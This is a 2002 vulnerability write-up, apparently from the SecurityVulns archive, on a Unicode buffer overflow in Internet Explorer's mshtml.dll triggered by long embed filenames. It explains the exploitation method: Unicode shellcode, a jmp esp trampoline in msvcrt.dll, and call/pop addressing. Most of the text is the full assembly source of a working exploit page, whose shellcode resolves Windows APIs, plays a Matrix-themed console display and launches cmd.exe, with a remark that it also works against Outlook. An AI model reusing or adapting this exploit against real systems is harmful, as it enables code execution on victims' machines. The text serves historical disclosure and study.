Details and exploitation of buffer overflow in mshtml.dll (and few sidenotes on Unicode overflows in general)

Type securityvulns
Reporter Securityvulns
Modified 2002-02-27T00:00:00



Advisory was originally posted in [1-3] 2 weeks ago, so I think it's enough time passed to publish some details, because [4,5] have enough information to re-discover vulnerability.

ERRor <error(at)> discovered IE 5.5 and 6.0 in some cases crash on

<embed src="filename.AAAAAAAAAA<lot of 'A's>">

with EIP 0x41004100.

Overflow occurs then IE concatenates file extension to "Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\" with wcscat().

There is another input validation bug in Internet Explorer: it fails to detect if file has no extension. In this case it looks for dot before filename and treats everything after that dot like an extension... So, it's possible to overflow buffer with long filename without extension.

The rest of this paper is for vuln-dev :)

It's a kind of Unicode buffer overflow so much discussed on Vuln-Dev some time ago. Usually we do not code and release any exploits for "standard" holes like format strings or overflows and only point vulnerability is exploitable. The only reason of this paper is to show how easy is exploitation of this sort of bug. In future we do not plan to release any exploits of this kind.

There are few problems for one who wants to create exploit:

  1. All data is converted to Unicode, that is 'A' will be converted to 0x0041.
  2. Address of shellcode will be different depending on number of open Internet Explorer windows, Windows and Internet Explorer version and patches installed.
  3. There is different offset of saved EIP in stack in Internet Explorer before and after IE5.5SP2.
  4. One more small problem.... We will not describe it because it may help to stop virus or scriptkiddie with exploit if one appear in-the-wild.

Now you can try to exploit this bug by yourself... I've got working exploit after half of hour without using any debugger/disassembler :)

One of the first Unicode overflows found in-the-wild was vulnerability in IIS ISAPI filter found by eEye[6]. They failed to make really working exploit, saying exploiting of this kind of bug is hard. This bug was successfully exploited by hsj and later by authors of CodeRed worm. It brings us to the fact: EXPLOITATION OF UNICODE OVERFLOWS IS EASY. There is easy way to bypass conversion of the shellcode to Unicode: it should be in Unicode already. It was a trick used by CodeRed (wonderful analysis of CodeRed was made by Andrey Kolishak in [7]). I wrote about Unicode HTMLs in [8] (in fact [8] was released to prevent possible impacts of this paper but didn't succeeded, because multiple filters still don't check Unicode htmls).

Andrey pointed to easy (and well known) way to avoid second problem - hardcoded shellcode address. Instead of overwriting saved EIP with address of our shellcode we can use indirect jump - overwrite eip with address of instruction in memory space of some dll which will jump back to our code via ebp or esp (ebp may be used if exploiting format strings). We fond jmp esp (FFE4) in all versions of kernel32.dll and in one version of msvcrt.dll (6.10.8924.0). This version of dll doesn't depend on Internet Explorer and presents in most installation of Windows NT 4.0 and Windows 2000 we checked (but never in Windows 95/98/ME/XP), so we used it.

Third problem was solved by using few noops and

call xxxx ... xxxx: pop ebp

combination to get the exact address of our shellcode.

Since exploit is in Unicode we may do not care about '\0' (0x0000, 0xFFFF are prohibited and we have to care about calls and far jumps) so, we did large shellcode with visual effects. If you like it you can download full version of dH & SECURITY.NNOV Matrix screensaver from

Resulting HTML (will work with msvcrt.dll 6.10.8924.0 and doesn't depend on mshtml.dll version, program used and Windows version) can be obtained from Same file (properly encoded to UTF-7, UTF-8, quoted-printable or base64) may be used to exploit Outlook Express/Outlook. (I've just noticed that under Windows 2000 terminal window sometimes is open in background and you need to switch... Well... It's not good but I don't bother to patch it :) ).

Below is source code for matrix.htm:

-=-=-=-=-=-=-=-=- begin matrix.asm -=-=-=-=-=-=-=-=- ; ; matrix.asm - source code for matrix.htm ; ; build: ; tasm matrix.asm /m2 ; tlink matrix.obj, matrix.htm /t /3 ; ; Authors: ; ERROR: bug discovery ; 3APA3A: idea and coding ; OFFliner: matrix effects and undocumented Windows API ; ; Thanx to Andrey Kolishak for indirect esp jump idea ; ; you can obtain matrix screensaver from ; ; ; ; eipjmp: overwrites saved EIP for all versions of ; mshtml.dll ; espjmp: gets control after jmp esp and calls code1 ; code1: restores EIP from stack after call to ebp ; does some actions and jumps to code2 ; code2: does the rest of actions

datap equ (DataTable+080h) hKernel32 equ LoadL-datap cCur equ StringTable-datap SetCCH equ StringTable+4-datap GetSH equ StringTable+8-datap Sleep equ StringTable+12-datap WriteC equ StringTable+16-datap AllocC equ StringTable+20-datap SetCDM equ StringTable+24-datap SetCTA equ StringTable+28-datap SetCCI equ StringTable+32-datap WinE equ StringTable+36-datap ExitP equ StringTable+40-datap

hStdOut equ StringTable+48-datap dwOldMode equ cCur conCur equ StringTable+52-datap cls equ StringTable+56-datap DWNumChar equ StringTable+60-datap RegHK equ user-datap

.386 _faked segment para public 'CODE' use32 assume cs:_faked start: _faked ends

_main segment para public 'DATA' use32 assume cs:_main

prefix: begin db 0ffh,0feh ;Unicode prefix db "<",0,"e",0,"m",0,"b",0,"e",0,"d",0,0dh,0 db "s",0,"r",0,"c",0,"=",0,34,0 db "h",0,"t",0,"t",0,"p",0,":",0,"/",0,"/",0 db "w",0,"w",0,"w",0,".",0 db "s",0,"e",0,"c",0,"u",0,"r",0,"i",0,"t",0,"y",0,".",0 db "n",0,"n",0,"o",0,"v",0,".",0,"r",0,"u",0 db "/",0,"f",0,"i",0,"l",0,"e",0,"s",0,"/",0 db "i",0,"e",0,"b",0,"o",0,"/",0,"X",0 db "!(c)3APA3A" db 22 dup(090h) code1: pop ebp mov esp,ebx xor eax,eax dataoffset = DataTable - code2 ebpdiff = 80h + dataoffset mov ax,ebpdiff add ebp,eax ;ebp points to data

    lea eax,[ebp+user-datap]
    push eax
    mov ebx,[ebp+LoadL-datap]
    mov eax,[ebx]
    mov [ebp+LoadL-datap],eax
    call eax                        ;LoadLibraryA&#40;&quot;user32.dll&quot;&#41;
    lea ebx,[ebp+reg-datap]
    push ebx
    push eax
    mov ebx,[ebp+GetPA-datap]
    mov eax,[ebx]
    mov [ebp+GetPA-datap],eax
    call eax                        ;GetProcAddress&#40;.,&quot;RegisterHotKey&quot;&#41;
    mov [ebp+RegHK],eax
    lea edi,[ebp+rhk-datap]
    movzx esi,byte ptr[edi]

LoopHotkey: inc edi xor eax,eax mov al,[edi] push eax inc edi mov al,[edi] push eax inc edi mov al,[edi] push eax xor eax,eax push eax call [ebp+RegHK] dec esi or esi,esi jnz LoopHotKey

    lea eax,[ebp+StringTable-datap] ;string &quot;kernel32.dll&quot;
    push eax
    call [ebp+LoadL-datap]          ;LoadLibraryA&#40;&quot;kernel32.dll&quot;&#41;
    mov [ebp+hKernel32],eax         ;hKernel32 =

    lea eax, [ebp+SetCCH]
    mov [ebp+cCur],eax              ;*cCur = SetCCH
    lea edi,[ebp+funcnum-datap]
    movzx esi,byte ptr[edi]         ;esi=funcnum
    inc edi

LoopResolve: push edi push dword ptr [ebp+Hkernel32] call [ebp+GetPA-datap] ;GetProcAddress(edi) mov ebx,[ebp+cCur] mov [ebx],eax ;save func address xor ecx,ecx mov cl,4 add ebx,ecx mov [ebp+cCur],ebx ;cCur+=4 not ecx xor eax,eax repnz scasb ;find \0 dec esi or esi,esi jnz LoopResolve

    call [ebp+AllocC]               ;AllocConsole&#40;&#41;
    push eax                        ;nonzero if succeed
    xor eax,eax
    push eax
    call [ebp+SetCCH]               ;SetConsoleCtrlHandler&#40;NULL,TRUE&#41;
    xor eax,eax
    not eax
    sub al,0Ah
    push eax
    call [ebp+GetSH]                ;GetStdHandle&#40;STD_OUTPUT_HANDLE&#41;
    mov [ebp+hStdOut],eax           ;hStdOut=
    lea eax,[ebp+dwOldMode]
    push eax
    xor ebx,ebx
    inc ebx
    push ebx
    push dword ptr [ebp+hStdOut]
    call [ebp+SetCDM]               ;SetConsoleDisplayMode&#40;hStdOut, 1, &amp;dwOldMode&#41;
    xor ebx,ebx
    mov bl,0Ah
    push ebx
    push dword ptr [ebp+hStdOut]
    call [ebp+SetCTA]               ;SetConsoleTextAttribute&#40;hStdOut,FOREGROUND_INTENSITY|FOREGROUND_GREEN&#41; 
    xor ebx,ebx
    mov [ebp+ConCur+4],ebx          ;ConCur.bVisible = 100
    mov bl, 100
    mov [ebp+ConCur],ebx            ;ConCur.dwSize = 0
    lea eax, [ebp+ConCur]
    push eax
    push dword ptr [ebp+hStdOut]
    call [ebp+SetCCI]               ;SetConsoleCursorInfo&#40;hstdOut,&amp;ConCur&#41;
    xor eax,eax
    mov ax,1000
    push eax
    call[ebp+Sleep]                 ;Sleep&#40;1000&#41;;
    xor ebx,ebx
    mov bl, string-datap
    mov eax,ebp
    add eax,ebx
    mov [ebp+cCur],eax              ;cCur = string
    mov eax,ebp
    mov bx,datap-empty_string
    sub eax,ebx
    mov [ebp+cls],eax               ;set address of empty_string

LOOP1: ;do do xor eax,eax push eax lea ebx,[ebp+DWNumChar] push ebx inc eax push eax mov eax,[ebp+cCur] push eax push dword ptr [ebp+hStdOut] call [ebp+WriteC] ;WriteConsole(hStdOut,(void)cCur,1,&DWNumChar,NULL); xor eax,eax mov al,100 mov ecx,[ebp+cCur] mov bl,[ecx] sub bl,20 jnz N1 mov ax,400 N1: mov bl,[ecx] sub bl,8 jnz N2 mov ax,2100 N2: push eax call [ebp+Sleep] ;Sleep((cCur==' ')?400:(cCur=='\b')?2100:100) mov ecx,[ebp+cCur] inc ecx mov [ebp+cCur],ecx ;++cCur mov bl,[ecx] sub bl,9 jnz LOOP1 ;while(cCur!='\t'); call [ebp+cls] mov ecx,[ebp+cCur] inc ecx mov [ebp+cCur],ecx ;++cCur mov bl,[ecx] sub bl,00Ah jnz LOOP1 ;while(*cCur!='\n'); inc ecx xor eax,eax push eax lea ebx,[ebp+DWNumChar] push ebx mov al,18 push eax push ecx push dword ptr [ebp+hStdOut] jmp code2

codelength = $ - begin neednoops = 1d4h - codelength db neednoops dup(090h) eipjmp:

            dd      78024e02h
            dd      78024e02h
            dd      78024e02h
            dd      78024e02h
            dw      9090h
            dd      78024e02h       ;EIP for IE &lt; 55SP2


            db 18 dup&#40;090h&#41;
    xor eax,eax                     ;ESP comes here
    mov ax,0170h
    mov ebx,esp
    sub ebx,eax
    call ebx

code2: call [ebp+WriteC] xor eax,eax mov ax,4000 push eax call [ebp+Sleep] call [ebp+cls] lea eax,[ebp+cmdexe-datap] push eax push eax call [ebp+WinE] xor eax,eax push eax call [ebp+ExitP]

empty_string: ; some code can be pasted here xor eax,eax mov ax,1000 push eax call [ebp+Sleep] ;Sleep(1000) xor eax,eax push eax lea ebx,[ebp+DWNumChar] push ebx mov al,30 push eax lea eax,[ebp+empty-datap] push eax push dword ptr [ebp+hStdOut] call [ebp+WriteC] ret


    LoadL   dd      780330d0h       ;LoadLibraryA import table entry
    GetPA   dd      780330cch       ;GetProcAddress import table entry


            db      &quot;kernel32.dll&quot;,0
    funcnum db      10
            db      &quot;SetConsoleCtrlHandler&quot;,0
            db      &quot;GetStdHandle&quot;,0
            db      &quot;Sleep&quot;,0
            db      &quot;WriteConsoleA&quot;,0
            db      &quot;AllocConsole&quot;,0
            db      &quot;SetConsoleDisplayMode&quot;,0
            db      &quot;SetConsoleTextAttribute&quot;,0
            db      &quot;SetConsoleCursorInfo&quot;,0
            db      &quot;WinExec&quot;,0
            db      &quot;ExitProcess&quot;,0
    user    db      &quot;user32.dll&quot;,0
    reg     db      &quot;RegisterHotKey&quot;,0
    cmdexe  db      &quot;cmd.exe&quot;,0
    rhk     db      5
            db      9,1,100,01bh,1,101,13,1,102,05dh,8,103,3,2,104
    empty   db      00dh,28 dup&#40;020h&#41;,00dh,0
    string  db      00dh,&quot; Wake Up, Neo...&quot;,00dh,009h,0
            db      00dh,&quot; The Matrix has you...&quot;,00dh,009h,0
            db      00dh,&quot; Follow the White Rabbit.&quot;,00dh,008h,009h,00ah,0
            db      00dh,&quot; Knock, knock...&quot;,00dh,0

    padding db      32

suffix: db 34,0,">",0,00ah copy db "(c) 2002 by 3APA3A, ERRor, OFFLiner"

_main ends end start -=-=-=-=-=-=-=-=- end matrix.asm -=-=-=-=-=-=-=-=-


[1] dH & SECURITY.NNOV: buffer overflow in mshtml.dll [2] Microsoft Security Bulletin MS02-005 [3] CAN-2002-0022 [4] CERT Advisory CA-2002-04 Buffer Overflow in Microsoft Internet Explorer [5] ISS Alert: Buffer Overflow in Microsoft Internet Explorer [6] All versions of Microsoft Internet Information Services Remote buffer overflow (SYSTEM Level Access) [7] Andrey Kolishak, History of one vulnerability (in Russian) [8] Bypassing content filtering software

-- /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles)